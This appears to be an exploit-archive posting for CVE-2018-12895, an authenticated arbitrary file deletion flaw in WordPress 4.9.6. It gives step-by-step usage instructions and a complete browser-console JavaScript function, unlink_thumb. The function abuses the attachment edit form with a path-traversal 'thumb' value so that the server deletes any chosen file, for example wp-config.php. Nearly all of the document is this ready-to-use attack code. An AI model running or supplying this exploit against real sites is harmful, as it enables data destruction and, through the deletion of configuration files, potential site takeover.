WordPress 4.9.6 Arbitrary File Deletion

WordPress version 4.9.6 arbitrary file deletion exploit. Original discovery of this vulnerability is attributed to VulnSpy in June of 2018.


MD5 | bac33d58bc4b3fb726d996d2e93b9d5b

# Exploit Title: Wordpress 4.9.6 - Arbitrary File Deletion (Authenticated) (2)
# Date: 04/08/2021
# Exploit Author: samguy
# Vulnerability Discovery By: Slavco Mihajloski & Karim El Ouerghemmi
# Vendor Homepage: https://wordpress.org
# Software Link: https://wordpress.org/wordpress-4.9.6.tar.gz
# Version: 4.9.6
# Tested on: Linux - Debian Buster (PHP 7.3)
# Ref : https://blog.ripstech.com/2018/wordpress-file-delete-to-code-execution
# EDB : EDB-44949
# CVE : CVE-2018-12895

/*

Usage:
1. Login to wordpress with privileges of an author
2. Navigates to Media > Add New > Select Files > Open/Upload
3. Click Edit > Open Developer Console > Paste this exploit script
4. Execute the function, eg: unlink_thumb("../../../../wp-config.php")
*/

function unlink_thumb(thumb) {

$nonce_id = document.getElementById("_wpnonce").value
if (thumb == null) {
console.log("specify a file to delete")
return false
}
if ($nonce_id == null) {
console.log("the nonce id is not found")
return false
}

fetch(window.location.href.replace("&action=edit",""),
{
method: 'POST',
credentials: 'include',
headers: {'Content-Type': 'application/x-www-form-urlencoded'},
body: "action=editattachment&_wpnonce=" + $nonce_id + "&thumb=" + thumb
})
.then(function(resp0) {
if (resp0.redirected) {
$del = document.getElementsByClassName("submitdelete deletion").item(0).href
if ($del == null) {
console.log("Unknown error: could not find the url action")
return false
}
fetch($del,
{
method: 'GET',
credentials: 'include'
}).then(function(resp1) {
if (resp1.redirected) {
console.log("Arbitrary file deletion of " + thumb + " succeed!")
return true
} else {
console.log("Arbitrary file deletion of " + thumb + " failed!")
return false
}
})
} else {
console.log("Arbitrary file deletion of " + thumb + " failed!")
return false
}
})
}



Related Posts